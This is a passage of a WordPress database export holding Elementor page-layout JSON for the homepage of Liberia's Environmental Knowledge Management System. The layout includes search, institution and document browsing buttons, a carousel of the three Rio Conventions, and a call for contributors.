center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"#\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.4,\"hover_opacity\":0.6,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(11518,1868,'_elementor_version','2.7.5'),(11519,1868,'_elementor_template_type','wp-page'),(11520,1868,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(11523,1869,'_wp_page_template','default'),(11524,1869,'_elementor_edit_mode','builder'),(11525,1869,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center 